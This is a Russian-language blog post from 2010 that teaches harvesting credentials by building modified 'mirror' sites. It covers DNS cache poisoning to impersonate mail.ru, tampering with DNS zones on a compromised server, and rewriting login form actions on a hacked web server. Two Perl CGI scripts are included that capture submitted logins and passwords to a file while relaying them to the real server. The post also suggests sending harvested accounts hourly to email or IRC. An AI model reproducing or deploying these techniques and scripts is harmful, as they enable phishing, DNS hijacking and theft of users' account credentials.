Зазеркалье - 10 Сентября 2010 - WIKI сайт про всё, что можно подумать
E-mail:
Пароль:

Wiki сайт: Всё про всё

Меню сайта
Главная » 2010 » Сентябрь » 10 » Зазеркалье
11:54 Am
Зазеркалье

                                                           
 
Все знают что-такое зеркала. Нет, не те зеркала, в которых вы видите вечно не выспавшуюся, немного под хмельком рожу ;))) - Зеркала сайтов.Т.е.есть полная копия сайта, для облегчения доступа и снижения нагрузки на основную машину. Но мы приспособим эту идею под свои нужды, пойдем дальше таких зеркал, то есть в Зазеркалье =). Это те же зеркала, тока немного искривленные (модифицированные). Итак, рассмотрим что это такое и зачем оно нужно. Я рассмотрю несколько случаев, так сказать интересных, когда могут понадобиться эти кривые зеркала. Вариант первый. Вы успешно атаковали DNS кэш какого-либо сервера. И вместо всеми любимого mail.ru пользователям выдают наш левый ип адрес. Далее, чтоб не растраивать посетителей, мы делаем на нем полное зеркало mail.ru, за небольшим исключением. В форме отвественной за проверку аккаунта подменяем form action на путь к нашему скрипту, задача которого сводиться к следующему, принять аккаунт, сделать http запрос по реальному IP адресу сервера, на проверку полученного аккаунта. И в зависимости от ответа записать его в текстовой файл, далее выдать получнный ответ, с подправленными ссылками. Вида : http://mailbox.mail.ru/mail.cgi меняем на http://mail.ru/cgi-bin/mirror.pl?redir=http://mailbox.mail.ru/mail.cgi Что делает mirror.pl, я думаю, понятно. Просто соединяеться с реальным сервером передает все что надо (cookies,form_field etc.) и возвращает ответ от реального сервера стакими же подправленымина [себя линками. В итоге, после экспериментов и настройкой скриптов мы имеем полное зеркало сайта, немного правда искревленное нужной нам функцией =).Для особо ленивых могу посоветовать ежечасный сброс собранных аккаунтов на мыло или на популярный IRC канал =). Единственное добавлю, что настройку и отладку такого вот кривого зеркала, необходимо делать до подмены данных в DNS кэше,иначе громкие вопли юзверев в суппорт в процессе подготовки зеркала сведут все результаты на нет =). 

Вариант второй. Многие, захватив сервер, и не найдя с первого взгляда вкусных баз\инфы , забивают на него , при этом очень часто , забывают поглядеть в /var/named или c:\winnt\system32\dns , так как в случае, если эта машина отве- тственна за какую-либо DNS зону, то намного целесообразнее найти в ней что-нибудь вкусное, типа radius.our.zone or billing.our.zone :) , и просто изменить IP адрес этого имени. Не забывая дать named-у сигнал перечитать конфигурационный файл (не забывайте о записи serial, чтоб инфа о новом ИП дошлаидо вторичного ДНС сервера тоже ;) ). Или в случае вин32, после изменения текстовых файлов обычного юниксового формата, перезапустить сервис. Рекомендации по строительству кривого зеркала абсолютно такие-же как и в первом случае.

Вариант третий (самый распространенный). Часто случаеться так, что получив контроль над машиной, понимаеш, что смотрел задницей, и прозевал что форма передает данные не на эту машину а на другую. Или получить доступ на главный WWW сервер оказалось делом плевым, а вот получить доступ к серверу, куда отправляються данные для авторизации, в короткие сроки не реально. В этой ситуации, наиболее простым решением, являеться изменение поля action, в форме, которая отправляет нужные данные, на путь к своему скрипту(на этом же, или другом сер- вере). Который будет опрашивать реальный, и возвращать результат, или перена- правлять на реальный, в зависимости от конкретного случая, есственно с сохра- неним проходящей информации =). Также, тут можно включить фантазию, и добавить пару полей в форму, или повесить сочный баннер призывающий, якобы "попатчить" новую ошибку в системе, контроль над которой, мы хотим получить =))). Ниже, идут примеры скриптов, но мне лень делать что-либо общее и универсаль- ное, так как писать скрипты, особенно на перле, должен уметь каждый програмер, а вы уж и подавно =). Потому что, сегодня без автоматизции, жить трудно =). --------------------------------------------- #!perl use Socket; use CGI param; $text1=param("text1"); $text2=param("text2"); $text3=param("text3"); $remote="xxx.xxx.xx.x";$port="80"; if ($port =~ /\D/) { $port = getservbyname($port, 'tcp') }; $iaddr = inet_aton($remote); $paddr = sockaddr_in($port, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket()"; connect(SOCK, $paddr); $data="text1=$text1&text2=$text2&text3=$text3"; send SOCK,"POST /mail HTTP/1.1\n",0; send SOCK,"Content-Length: ".length($data)."\n",0; send SOCK,"Content-Type: application/x-www-form-urlencoded\n",0; send SOCK,"Connection: Keep-Alive\n\n",0; send SOCK,$data,0; while(){$ret="$ret"."$_";} open (FILE2 ,">>_log.txt") || die "open() log $! $@"; print FILE2 "---=$remote:$port=---\n$ret\n$data\n\n"; close FILE2; close(SOCK); ----------------------------------------------- #!perl use CGI param; $login=param("login");$pass=param("pass"); print "Location: https://xx.xx/check/check.php?login=$login&pass=$pass\n\n"; open WR, ">>data.txt";print WR "$login:$pass\n";close WR; ----------------------------------------------- P.S. Возможно эта статья покажеться кому-то слишком простой и неинтересной, но я просто хотел заострить внимание, на том, как еще можно использовать, машины в интернете, помимо исользования их обьемов винтов, процессорных реурсов, и каналов в Сеть. А так же рассказать про возможности, которые многие упускают сосредоточившись на поиске дырок непосредственно на цели атаки.

 

 

Категория: Советы Безопасности при Использовании компьютера | Просмотров: 8 | Добавил: torayevtm | Рейтинг: 0.0/0
Всего комментариев: 0
Имя *:
Email:
Код *: